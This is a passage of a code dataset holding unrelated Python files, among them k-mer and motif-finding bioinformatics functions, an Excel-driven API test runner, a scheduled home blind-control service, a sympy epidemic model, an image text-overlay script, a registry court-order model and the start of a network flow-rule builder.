t[j:j+k]\n for i in range(len(t) - len(p) + 1): \n if(p == t[i: i + len(p)]):\n count+= 1\n occurrences.append(i) \n d.update({p:occurrences})\n occurrences = []\n return d\n \ndef patternCount(t,p):\n #Counts the number if occurences if a k-mer in a dna sequence (naive)\n count = 0\n for i in range(len(t) - len(p) + 1): \n if(p == t[i: i + len(p)]):\n count+= 1 \n return count\n\ndef approximatePatternCount(text,pattern,d):\n '''count instances of pattern with at most d mismatches'''\n count = 0\n l = []\n for i in range(len(text) - len(pattern) + 1):\n p = text[i: i + len(pattern)]\n if(hammingDistance(pattern,p) <= d):\n count = count + 1\n l.append(i)\n return count\n \ndef approximatePatternMatch(text,pattern,d):\n '''count instances of pattern with at most d mismatches'''\n l = []\n for i in range(len(text) - len(pattern) + 1):\n p = text[i: i + len(pattern)]\n if(hammingDistance(pattern,p) <= d):\n \n l.append(i)\n return l\n \ndef readGenome(filename):\n genome = ''\n with open(filename, 'r') as f:\n for line in f:\n # ignore header line with genome information\n if not line[0] == '>':\n genome += line.rstrip()\n return genome\n \ndef getSequencingReads(filename):\n reads = []\n with open(filename, 'r') as f:\n for line in f:\n reads.append(line.rstrip())\n return reads\n \n#Hamming Distance - Problem 1\ndef hammingDistance(s1, s2):\n \"\"\"Compute the Hamming distance between two strings\"\"\"\n #test that they have values\n if len(s1) == 0: return len(s2)\n if len(s2) == 0: return len(s1) \n #Convert the int lists to strings\n str1 = ''.join(str(e) for e in s1)\n str2 = ''.join(str(e) for e in s2) \n #Counter set at zero\n hamDist = 0\n for i in range(0, len(str1)):\n #If the values at the specified index aren't equal\n if str1[i] != str2[i]:\n #increment\n hamDist += 1 \n #Return the total count.\n return hamDist\n \ndef distanceBetweenPatternAndStrings(pattern,dna):\n \"\"\"Computes the the sum total distance between kmer and a list of DNA strings\"\"\"\n k = len(pattern)\n distance = 0\n totalDistance = 0\n for text in dna:\n hd = float('inf')\n # generate all kmer pattern' in text\n kmers = kmersFromDNA(text,k)\n for j in kmers:\n distance = hammingDistance(pattern,j)\n if hd > distance:\n hd = distance\n totalDistance += hd \n return totalDistance\n \n \n \n \ndef medianString(dna,k):\n distance = float('inf') \n for i in range(int(4**k)): \n pattern = NumberToPattern(i,k)\n if distance > distanceBetweenPatternAndStrings(pattern,dna):\n distance = distanceBetweenPatternAndStrings(pattern,dna)\n median = pattern \n return median\n\ndef LastSymbol( pattern ):\n return pattern[ -1: ]\n\ndef skew(sequence):\n \"\"\"Find a position in a genome where the skew diagram attains a minimum.\"\"\"\n c = 0\n g = 0\n min_skew = 0\n skew_list = []\n index = 0\n for i in sequence:\n index += 1\n if i == 'C':\n c += 1\n if i == 'G':\n g += 1\n skew = g-c\n if skew < min_skew:\n skew_list = [index]\n min_skew = skew\n if skew == min_skew and index not in skew_list:\n skew_list.append(index) \n print(skew_list)\n\ndef SymbolToNumber( symbol ):\n retVal = 10000\n if symbol == 'A':\n retVal = 0 \n elif symbol == 'C':\n retVal = 1\n elif symbol == 'G':\n retVal = 2\n elif symbol == 'T':\n retVal = 3\n return retVal\n\ndef NumberToSymbol( index ):\n symbol = 'Z'\n if index == 0:\n symbol = 'A'\n elif index == 1:\n symbol = 'C'\n elif index == 2:\n symbol = 'G'\n elif index == 3:\n symbol = 'T'\n return symbol\n\ndef PatternToNumber( pattern ):\n \"\"\"Convert a DNA string to a number\"\"\"\n if pattern == \"\":\n return 0\n if len( pattern ) > 0:\n subStrEndIndex = len( pattern ) - 1\n else:\n subStrEndIndex = 0\n prunedPattern = pattern[ 0: subStrEndIndex ]\n lastSymbol = LastSymbol( pattern )\n #The '4 *' allows the resulting numbers to be unique according to their symbol's positions.\n return 4 * PatternToNumber( prunedPattern ) + SymbolToNumber( lastSymbol )\n\ndef NumberToPattern( index, k ):\n \"\"\"Convert an integer to its corresponding DNA string.\"\"\"\n if k == 1:\n return NumberToSymbol( index )\n prefixIndex = index // 4\n remainder = index % 4\n prefixPattern = NumberToPattern( prefixIndex, k - 1 )\n symbol = NumberToSymbol( remainder )\n return prefixPattern + symbol \n\ndef computingFrequencies(text,k):\n \"\"\"Compute frequency array of kmers\"\"\"\n frequencyArray = []\n for i in range(int(4**k)): \n frequencyArray.append(0) \n for i in range(len(text)- k + 1):\n pattern = text[i:i+k]\n j = PatternToNumber(pattern)\n frequencyArray[j] = frequencyArray[j] + 1\n return frequencyArray\n \ndef frequentWords(text,k):\n \"\"\"Find the most frequent k-mers in a string\"\"\"\n frequentPatterns = []\n count = count = [0] * (len(text) - k + 1)\n for i in range(len(text) - k + 1):\n pattern = text[i:i+k]\n count[i] = patternCount(text,pattern)\n maxCount = max(count)\n for i in range(len(text) - k + 1):\n if(count[i] == maxCount):\n frequentPatterns.append(text[i:i+k])\n fp = set(frequentPatterns)\n result = []\n for i in fp:\n result.append(i)\n return result\n\ndef fasterFrequentWords(text,k):\n \"\"\"Find the most frequent k-mers in a string\"\"\"\n frequentPatterns = []\n frequencyArray = computingFrequencies(text,k)\n maxCount = max(frequencyArray)\n for i in range(int(4**k)): \n if frequencyArray[i] == maxCount:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns \n\ndef clumpFinding(genome,k,t,L):\n \"\"\"Find patterns forming clumps in a string.\"\"\"\n frequentPatterns = [] \n clump = [0] * int(4**k)\n for i in range(len(genome) - L):\n text = genome[i:i + L]\n frequencyArray = computingFrequencies(text,k)\n for index in range(int(4**k)): \n if(frequencyArray[index] >= t):\n clump[index] = 1\n for i in range(int(4**k)):\n if clump[i] == 1:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns\n \ndef neighbors(pattern,d):\n \"\"\"The d-neighborhood Neighbors(Pattern, d) is the set of all k-mers whose Hamming distance from Pattern does not exceed d.\"\"\"\n x = ['A','C','G','T']\n if d == 0:\n return pattern\n if len(pattern) == 1:\n return ['A','C','G','T']\n neighborhood = []\n suffixNeighbors = neighbors(suffix(pattern),d)\n for text in suffixNeighbors:\n if hammingDistance(suffix(pattern),text) < d:\n for nucleotide in x:\n p = nucleotide + text\n neighborhood.append(p)\n else:\n p = firstSymbol(pattern) + text\n neighborhood.append(p)\n return neighborhood\n \ndef suffix(pattern):\n return pattern[1:len(pattern)]\n \ndef prefix(pattern):\n return pattern[0:len(pattern) -1]\n\ndef firstSymbol(pattern):\n return pattern[0]\n \ndef immediateNeighbors(pattern):\n neighborhood = []\n for i in range(pattern):\n symbol = pattern[i]\n for j in range(pattern):\n if j != symbol:\n pattern[i] = j\n neighbor = pattern\n neighborhood.append(neighbor)\n return neighborhood\n\ndef frequentWordsWithMismatches(text,k,d):\n \"\"\"Find the most frequent k-mers with mismatches in a string.\"\"\"\n frequentPatterns = [] \n frequencyArray = [] \n close = []\n for i in range(int(4**k)):\n frequencyArray.append(0)\n close.append(0)\n for i in range(len(text) - k):\n neighborhood = neighbors(text[i:i+k],d)\n for pattern in neighborhood:\n index = PatternToNumber(pattern)\n close[index] = 1\n for i in range(int(4**k)):\n if(close[i] == 1):\n pattern = NumberToPattern(i,k)\n frequencyArray[i] = approximatePatternCount(text,pattern,d) \n maxCount = max(frequencyArray)\n for i in range(int(4**k)):\n if frequencyArray[i] == maxCount:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns \n \ndef motifEnumeration(dna,k,d):\n \"\"\"Gets kmers from all DNA strings, searches them for kmers with at most d mistmatches then looks for d-neighbors that appear on all dna strings\"\"\"\n patterns = []\n primePatterns = []\n counter = 0\n kmers = kmersFromDNAList(dna,k) \n # we get all neighbors of all the kmers of all dna strings\n for kmer in kmers:\n n = neighbors(kmer,d)\n for i in n:\n primePatterns.append(i)\n #now we search for all prime patterns in all string with at most d mismatches\n for j in primePatterns:\n for string in dna:\n l = approximatePatternMatch(string,j,d)\n if len(l) > 0:\n counter += 1\n if counter >= len(dna):\n patterns.append(j) \n counter = 0\n counter = 0 \n return set(patterns)\n \ndef generateKmers(k):\n \"\"\"Generate all possible kmers of length k\"\"\"\n kmers = []\n for i in range(int(4**k)):\n pattern = NumberToPattern(i,k)\n kmers.append(pattern)\n return kmers\n\ndef kmersFromDNA(d,k):\n \"\"\"Retunrs a list of k-mers from a string of DNA\"\"\"\n kmers = []\n for i in range(len(d) - k + 1): \n kmers.append(d[i:i+k]) \n return kmers\n \ndef kmersFromDNAList(dna,k):\n kmers = []\n for i in dna:\n l = kmersFromDNA(i,k)\n for j in l:\n kmers.append(j)\n return kmers\n \ndef searchFrequentWords(d,l):\n max = 0\n key = \"\"\n value = 0\n r = {}\n for k,v in d.items():\n w = kmerCount(l,v)\n #get max\n for k,v in w.items():\n if len(v) > max:\n key = k\n value = v\n max = len(v)\n r.update({key:value}) \n return r\n\ndef genomePath(d):\n seq = d[0]\n for i in d: \n seq += i[-1]\n return seq\n \ndef graphExample():\n G=nx.Graph()\n G.add_node(\"spam\")\n G.add_edge(1,2)\n G.add_edge(2,3)\n return G\n \ndef kmerCompositionLexigographic(s,k):\n kmers = kmersFromDNA(s,k)\n kmers.sort()\n return kmers\n \ndef kmerGraph(s,k):\n d = kmersFromDNA(s,k)\n G=nx.DiGraph()\n for i in d:\n G.add_node(i)\n for j in d:\n if suffix(i) == prefix(j):\n G.add_edge(i,j)\n return G\n\ndef kmerdeBruijnGraph(s,k):\n d = kmersFromDNA(s,k)\n G=nx.DiGraph()\n for i in d:\n G.add_node(prefix(i))\n for j in d:\n if suffix(i) == prefix(j):\n G.add_edge(prefix(i),suffix(i))\n G.add_node(suffix(d[len(d)- 1]))\n return G\n \n \n###############################################################################\n","sub_path":"ProteoGenomics/Genomics/Chapter1_3.py","file_name":"Chapter1_3.py","file_ext":"py","file_size_in_byte":14365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371585340","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/11/6 14:41\n# @Software: PyCharm Community Edition\n# @Author : Ada\n# @File : do_excel.py\n# 完成excel的读与写\nimport openpyxl\n\nfrom API.API_7.common import http_request\n\n\"\"\"\n测试用例类,每个测试用例,实际上就是它的一个实例\n\"\"\"\nclass Case:\n def __init__(self):\n self.case_id=None\n self.title=None\n self.url=None\n self.data=None\n self.method=None\n self.excepted=None\n self.actual=None\n self.result=None\n self.sql=None\nclass DoExcel:\n\n def __init__(self,file_name,sheet_name):\n self.file_name = file_name\n self.sheet_name = sheet_name\n self.workbook = openpyxl.load_workbook(file_name)\n self.sheet = self.workbook[sheet_name]\n def get_cases(self):\n max_row=self.sheet.max_row#获取最大行数\n\n cases=[]#列表,存放所有的测试用例\n for r in range(2,max_row+1):\n\n case=Case()#实例\n case.case_id=self.sheet.cell(row=r,column=1).value\n case.title=self.sheet.cell(row=r, column=2).value\n case.url=self.sheet.cell(row=r, column=3).value\n case.data=self.sheet.cell(row=r, column=4).value\n case.method=self.sheet.cell(row=r, column=5).value\n case.expected=self.sheet.cell(row=r, column=6).value\n case.sql=self.sheet.cell(row=r,column=9).value#执行的sql\n cases.append(case)\n\n self.workbook.close()\n return cases#返回case列表\n\n def write_result(self,row,actual,result):\n sheet=self.workbook[self.sheet_name]\n sheet.cell(row,7).value= actual\n sheet.cell(row,8).value = result\n self.workbook.save(filename=self.file_name)\n self.workbook.close()\n\nif __name__==\"__main__\":\n from API.API_3.common import contants\n do_excel=DoExcel(contants.case_file,sheet_name='login')\n cases=do_excel.get_cases()\n http_request= http_request.HTTPRequest()\n for case in cases:\n # print(case.case_id)\n # print(case.title)\n # print(case.url)\n # print(case.data)\n # print(case.method)\n # print(case.excepted)\n print(case.__dict__)\n print(type(case.data))\n resp=http_request.request(case.method,case.url,case.data)\n print(resp.status_code)\n print(resp.text)#响应文本\n resp_dict = resp.json()#返回字典\n print(resp_dict)\n\n actual=resp.text\n if case.excepted == actual:#判断期望结果和实际结果是否一致\n do_excel.write_result(case.case_id+1,actual,'PASS')\n\n else:\n do_excel.write_result(case.case_id+1,actual,'FAIL')","sub_path":"common/do_excel.py","file_name":"do_excel.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"138081890","text":"\n\nfrom xai.brain.wordbase.nouns._cure import _CURE\n\n#calss header\nclass _CURED(_CURE, ):\n\tdef __init__(self,): \n\t\t_CURE.__init__(self)\n\t\tself.name = \"CURED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cure\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cured.py","file_name":"_cured.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"180525646","text":"\n\nfrom xai.brain.wordbase.nouns._penguin import _PENGUIN\n\n#calss header\nclass _PENGUINS(_PENGUIN, ):\n\tdef __init__(self,): \n\t\t_PENGUIN.__init__(self)\n\t\tself.name = \"PENGUINS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"penguin\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_penguins.py","file_name":"_penguins.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"299662383","text":"import datetime\nimport _thread\nimport time\n\nfrom rx import Observable\nfrom rx import operators as ops\nfrom rx.scheduler import EventLoopScheduler\nfrom smart_home.BlindAction import BlindAction, Blind\nfrom relay import GpioClient\nfrom threading import Timer\n\nimport schedule\n\n\nclass BlindsService(object):\n def __init__(self):\n self.__gpioClient = GpioClient.GpioClient()\n self.__buttonState = {}\n self.__blindUp = {}\n self.__blindUpTimer = {}\n self.__blockTimer = None\n self.__scheduler = EventLoopScheduler()\n self.__relayActiveActions = {\n BlindAction.Blind1Up: self.__gpioClient.blind1UpStart,\n BlindAction.Blind2Up: self.__gpioClient.blind2UpStart,\n BlindAction.Blind3Up: self.__gpioClient.blind3UpStart,\n BlindAction.Blind4Up: self.__gpioClient.blind4UpStart,\n BlindAction.Blind5Up: self.__gpioClient.blind5UpStart,\n BlindAction.AllUp: self.__gpioClient.allBlindsUpStart,\n BlindAction.AllUp2: self.__gpioClient.allBlindsUpStart,\n BlindAction.Blind1Down: self.__gpioClient.blind1DownStart,\n BlindAction.Blind2Down: self.__gpioClient.blind2DownStart,\n BlindAction.Blind3Down: self.__gpioClient.blind3DownStart,\n BlindAction.Blind4Down: self.__gpioClient.blind4DownStart,\n BlindAction.Blind5Down: self.__gpioClient.blind5DownStart,\n BlindAction.AllDown: self.__gpioClient.allBlindsDownStart,\n BlindAction.AllDown2: self.__gpioClient.allBlindsDownStart\n }\n self.__relayInactiveActions = {\n BlindAction.Blind1Up: self.__gpioClient.blind1UpStop,\n BlindAction.Blind2Up: self.__gpioClient.blind2UpStop,\n BlindAction.Blind3Up: self.__gpioClient.blind3UpStop,\n BlindAction.Blind4Up: self.__gpioClient.blind4UpStop,\n BlindAction.Blind5Up: self.__gpioClient.blind5UpStop,\n BlindAction.AllUp: self.__gpioClient.allBlindsUpStop,\n BlindAction.AllUp2: self.__gpioClient.allBlindsUpStop,\n BlindAction.Blind1Down: self.__gpioClient.blind1DownStop,\n BlindAction.Blind2Down: self.__gpioClient.blind2DownStop,\n BlindAction.Blind3Down: self.__gpioClient.blind3DownStop,\n BlindAction.Blind4Down: self.__gpioClient.blind4DownStop,\n BlindAction.Blind5Down: self.__gpioClient.blind5DownStop,\n BlindAction.AllDown: self.__gpioClient.allBlindsDownStop,\n BlindAction.AllDown2: self.__gpioClient.allBlindsDownStop\n }\n\n _thread.start_new_thread(self.__configureAutomations, ())\n\n def addSwitch(self,\n observable: Observable,\n blindAction: BlindAction,\n blind: Blind):\n # Initialize states\n self.__buttonState[blindAction] = False\n self.__blindUp[blind] = False\n\n # Add a handler to the switch state\n observable.pipe(ops.observe_on(self.__scheduler)).subscribe(\n lambda active: self.__pressedHandler(blindAction, blind, active))\n\n def __configureAutomations(self):\n # Special rules\n schedule.every().friday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().friday.at(\"07:05\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Never close automatically\n schedule.every().day.at(\"18:26\").do(self.__gpioClient.block)\n (schedule.every().day.at(\"18:34\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Do not open on the weekend.\n schedule.every().saturday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().saturday.at(\"07:04\")\n .do(self.__blockAutomationWhenAllAreUp))\n schedule.every().sunday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().sunday.at(\"07:04\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Open completly on weekdays.\n schedule.every().monday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().tuesday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().wednesday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().thursday.at(\"07:06\").do(self.__allBlindsUp)\n # schedule.every().friday.at(\"07:06\").do(self.__allBlindsUp)\n\n # Open slightly on weekends.\n schedule.every().saturday.at(\"09:00\").do(self.__openSlightly)\n schedule.every().sunday.at(\"09:00\").do(self.__openSlightly)\n\n # Close at 22:00 on weekdays\n schedule.every().sunday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().monday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().tuesday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().wednesday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().thursday.at(\"22:00\").do(self.__allBlindsDown)\n\n # Close at 00:00 on weekends\n schedule.every().friday.at(\"00:00\").do(self.__allBlindsDown)\n schedule.every().saturday.at(\"00:00\").do(self.__allBlindsDown)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n def __openSlightly(self):\n self.__unblockBlinds()\n self.__gpioClient.allBlindsUpStart()\n\n # Virtually press the button for 0.3 seconds\n t = Timer(0.4, self.__gpioClient.allBlindsUpStop)\n t.start()\n\n self.__blockBlinds()\n\n def __allBlindsUp(self):\n self.__unblockBlinds()\n\n # Activate relay\n self.__gpioClient.allBlindsUpStart()\n time.sleep(0.5)\n self.__gpioClient.allBlindsUpStop()\n time.sleep(0.5)\n self.__gpioClient.allBlindsUpStart()\n\n # Virtually press the button for 5 seconds\n t = Timer(5.0, self.__gpioClient.allBlindsUpStop)\n t.start()\n\n # Store all blinds are up\n for group in Blind:\n self.__blindUp[group] = True\n\n self.__blockBlinds()\n\n def __allBlindsDown(self):\n self.__unblockBlinds()\n\n # Store all blinds are down\n for group in Blind:\n self.__blindUp[group] = False\n\n # Activate relay\n self.__gpioClient.allBlindsDownStart()\n time.sleep(0.5)\n self.__gpioClient.allBlindsDownStop()\n time.sleep(0.5)\n self.__gpioClient.allBlindsDownStart()\n\n # Virtually press the button for 5 seconds\n t = Timer(5.0, self.__gpioClient.allBlindsDownStop)\n t.start()\n\n def __pressedHandler(\n self,\n blindAction: BlindAction,\n blind: Blind,\n active: bool):\n # Button State did not change ... skipping\n if self.__buttonState[blindAction] == active:\n return\n\n # Button State changed ... save it\n self.__buttonState[blindAction] = active\n\n # Button is pressed\n if active:\n self.__unblockBlinds()\n\n # Activate relay\n self.__handleRelayActive(blindAction, blind)\n\n # Button is released\n else:\n # Deactivate relay\n self.__handleRelayInactive(blindAction, blind)\n\n self.__blockBlinds()\n\n def __blockBlinds(self):\n # Block Wind/Time automation when all blinds are up\n # Dispose existing timer\n if self.__blockTimer is not None:\n self.__blockTimer.cancel()\n\n # Block the automation after 70 seconds\n self.__blockTimer = Timer(70.0, self.__blockAutomationWhenAllAreUp)\n self.__blockTimer.start()\n\n def __unblockBlinds(self):\n # Dispose existing timer\n if self.__blockTimer is not None:\n self.__blockTimer.cancel()\n\n # Unblock blinds\n self.__gpioClient.unblock()\n time.sleep(0.1)\n\n def __handleRelayActive(self, blindAction: BlindAction, blind: Blind):\n # Forward the signal to the GPIO Client\n self.__relayActiveActions[blindAction]()\n\n # Store the timestamp when the up signal was initiated\n # to detect if the blind is all the way up\n if blindAction in (BlindAction.Blind1Up,\n BlindAction.Blind2Up,\n BlindAction.Blind3Up,\n BlindAction.Blind4Up,\n BlindAction.Blind5Up,\n BlindAction.AllUp,\n BlindAction.AllUp2):\n self.__blindUpTimer[blind] = datetime.datetime.now()\n\n def __handleRelayInactive(self, blindAction: BlindAction, blind: Blind):\n # Forward the signal to the GPIO Client\n self.__relayInactiveActions[blindAction]()\n\n # If the up signal was sent for more than 2 seconds the blind is up\n if blindAction in (BlindAction.Blind1Up,\n BlindAction.Blind2Up,\n BlindAction.Blind3Up,\n BlindAction.Blind4Up,\n BlindAction.Blind5Up,\n BlindAction.AllUp,\n BlindAction.AllUp2):\n blindUp: bool = (datetime.datetime.now() -\n self.__blindUpTimer[blind]).total_seconds() > 2\n\n self.__blindUp[blind] = blindUp\n\n # Change all values in case the group all is triggered\n if (blindAction == BlindAction.AllUp or\n blindAction == BlindAction.AllUp2):\n for group in Blind:\n self.__blindUp[group] = blindUp\n\n # Store that not all blinds are at top\n else:\n self.__blindUp[blind] = False\n\n # Change all values in case the group all is triggered\n if (blindAction == BlindAction.AllDown or\n blindAction == BlindAction.AllDown2):\n for group in Blind:\n self.__blindUp[group] = False\n\n def __blockAutomationWhenAllAreUp(self):\n # Ensure all 5 blinds are registered\n if Blind.Blind1 not in self.__blindUp:\n return\n if Blind.Blind2 not in self.__blindUp:\n return\n if Blind.Blind3 not in self.__blindUp:\n return\n if Blind.Blind4 not in self.__blindUp:\n return\n if Blind.Blind5 not in self.__blindUp:\n return\n\n # Ensure all 5 blinds are up\n if not self.__blindUp[Blind.Blind1]:\n return\n if not self.__blindUp[Blind.Blind2]:\n return\n if not self.__blindUp[Blind.Blind3]:\n return\n if not self.__blindUp[Blind.Blind4]:\n return\n if not self.__blindUp[Blind.Blind5]:\n return\n\n # All blinds are up\n # Block the automation\n self.__gpioClient.block()\n","sub_path":"src/smart_home/BlindsService.py","file_name":"BlindsService.py","file_ext":"py","file_size_in_byte":10677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"426870678","text":"import numpy as np\nimport math\nfrom sympy import solve, Symbol, latex, simplify, symbols, Matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n# Symbolically find fixpts\nalpha, beta, S, I, N = symbols('alpha beta S I N')\ndSdt = -alpha*S*I/(I+S) + beta*I\ndIdt = alpha*S*I/(I+S) - beta*I\ndIdt_simple = alpha*(N-I)*I/N - beta*I\nsol = solve([dSdt,dIdt],[S,I])\nsol_2 = solve(dIdt_simple, I)\nprint(sol)\nprint(sol_2)\n\n# Bio relevant fp\nsol_bio = sol[1]\nprint(sol_bio)\n\n# Get Jacobian\nX = Matrix([S, I])\nY = Matrix([dSdt, dIdt])\nJ = Y.jacobian(X)\n\n# Get eigs\neigs = list(J.eigenvals().keys())\nprint('eigs' + str(eigs))\n\n# Linear dependence in eqts, use relevant eig..\nprint('eigs2' + str(simplify(eigs[0].subs([(S,sol_bio[0]),(I,sol_bio[1])]))))\n\n\nprint()\n\n\n# Print for latex\n#for j in range(len(sol)):\n #print('(S^*_%i,I^*_%i)&='%(j+1,j+1) + str(latex(sol[j])) + '\\\\\\\\')\n# print(sol[j])\n","sub_path":"2_a.py","file_name":"2_a.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"226911369","text":"#!/usr/bin/env python\n\n'''\n脚本语言的第一行,目的就是指出,你想要你的这个文件中的代码用什么可执行程序去运行它,就这么简单\n\n#!/usr/bin/Python是告诉操作系统执行这个脚本的时候,调用/usr/bin下的python解释器;\n#!/usr/bin/env python这种用法是为了防止操作系统用户没有将python装在默认的/usr/bin路径里。当系统看到这一行的时候,首先会到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作。\n#!/usr/bin/python相当于写死了python路径;\n#!/usr/bin/env python会去环境设置寻找python目录,推荐这种写法\n'''\n\n#show me the code(python version)\n\n#No.000 图片右上角加数字\n\n#2017-01-11 Rae Zhang\n\nimport string\nimport PIL\nfrom PIL import ImageFont,ImageDraw,Image\nimport random\n\n#set a random number\nimgNum=str(\"惊呆了\")\n\n#Read image\nim_file=\"/home/mingrui/图片/惊呆了\"\nim=Image.open(im_file)\nw,h=im.size\nwDraw=0.4*w\nhDraw=0.7*h\n\n#Draw image\n\nfont=ImageFont.truetype('SIMYOU',400)\n#设置字体及大小。字体文件位置/home/mingrui/下载/xmind-8-linux/fonts\ndraw=ImageDraw.Draw(im)\ndraw.text((wDraw,hDraw),imgNum,font=font,fill=(200,200,200))\n\n#save image\nim.save('惊呆了.jpg','jpeg')\n#注意jpg格式的全称是jpeg(第二个参数)\n\n\n","sub_path":"0000/000.py","file_name":"000.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"396253790","text":"# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This module holds data for amendment, renewal statement court order information.\"\"\"\nfrom __future__ import annotations\n\nfrom .utils import format_ts, ts_from_date_iso_format\nfrom .db import db\n\n\nclass CourtOrder(db.Model): # pylint: disable=too-many-instance-attributes\n \"\"\"This class manages all of the amendment, renewal statement court order information.\"\"\"\n\n __tablename__ = 'court_orders'\n\n id = db.Column('id', db.Integer, db.Sequence('court_order_id_seq'), primary_key=True)\n order_date = db.Column('order_date', db.DateTime, nullable=False)\n court_name = db.Column('court_name', db.String(256), nullable=False)\n court_registry = db.Column('court_registry', db.String(64), nullable=False)\n file_number = db.Column('file_number', db.String(20), nullable=False)\n effect_of_order = db.Column('effect_of_order', db.String(512), nullable=True)\n\n # parent keys\n registration_id = db.Column('registration_id', db.Integer, db.ForeignKey('registrations.id'), nullable=False,\n index=True)\n\n # Relationships - Registration\n registration = db.relationship('Registration', foreign_keys=[registration_id],\n cascade='all, delete', uselist=False)\n\n @property\n def json(self) -> dict:\n \"\"\"Return the court_order as a json object.\"\"\"\n court_order = {\n 'courtName': self.court_name,\n 'courtRegistry': self.court_registry,\n 'fileNumber': self.file_number,\n 'orderDate': format_ts(self.order_date)\n }\n if self.effect_of_order:\n court_order['effectOfOrder'] = self.effect_of_order\n\n return court_order\n\n @classmethod\n def find_by_id(cls, court_order_id: int = None):\n \"\"\"Return an expiry object by expiry ID.\"\"\"\n expiry = None\n if court_order_id:\n expiry = cls.query.get(court_order_id)\n\n return expiry\n\n @classmethod\n def find_by_registration_id(cls, registration_id: int = None):\n \"\"\"Return a list of expiry objects by registration number.\"\"\"\n expiry = None\n if registration_id:\n expiry = cls.query.filter(CourtOrder.registration_id == registration_id).one_or_none()\n\n return expiry\n\n @staticmethod\n def create_from_json(json_data, registration_id: int = None):\n \"\"\"Create a court order object from a json schema object: map json to db.\"\"\"\n court_order = CourtOrder()\n if registration_id:\n court_order.registration_id = registration_id\n\n court_order.court_name = json_data['courtName']\n court_order.court_registry = json_data['courtRegistry']\n court_order.file_number = json_data['fileNumber']\n court_order.order_date = ts_from_date_iso_format(json_data['orderDate'])\n if 'effectOfOrder' in json_data:\n court_order.effect_of_order = json_data['effectOfOrder']\n\n return court_order\n","sub_path":"ppr-api/src/ppr_api/models/court_order.py","file_name":"court_order.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"563803204","text":"# Copyright 2017 Telstra Open Source\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport time\nimport json\nfrom kafka import KafkaProducer\n\nfrom logger import get_logger\n\nimport config\n\nproducer = KafkaProducer(bootstrap_servers=config.KAFKA_BOOTSTRAP_SERVERS)\nlogger = get_logger()\n\n\ndef get_timestamp():\n return int(round(time.time() * 1000))\n\n\nclass Flow(object):\n def to_json(self):\n return json.dumps(\n self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n\n\ndef build_ingress_flow(path_nodes, src_switch, src_port, src_vlan,\n bandwidth, transit_vlan, flow_id, output_action,\n cookie, meter_id):\n output_port = None\n\n for path_node in path_nodes:\n if path_node['switch_id'] == src_switch:\n output_port = int(path_node['port_no'])\n\n if not output_port:\n raise ValueError('Output port was not found for ingress flow rule',\n \"path={}\".format(path_nodes))\n\n flow = Flow()\n flow.command = \"install_ingress_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = src_switch\n flow.input_port = src_port\n flow.output_port = output_port\n flow.input_vlan_id = src_vlan\n flow.transit_vlan_id = transit_vlan\n flow.output_vlan_type = output_action\n flow.bandwidth = bandwidth\n flow.meter_id = meter_id\n\n return flow\n\n\ndef build_egress_flow(path_nodes, dst_switch, dst_port, dst_vlan,\n transit_vlan, flow_id, output_action, cookie):\n input_port = None\n\n for 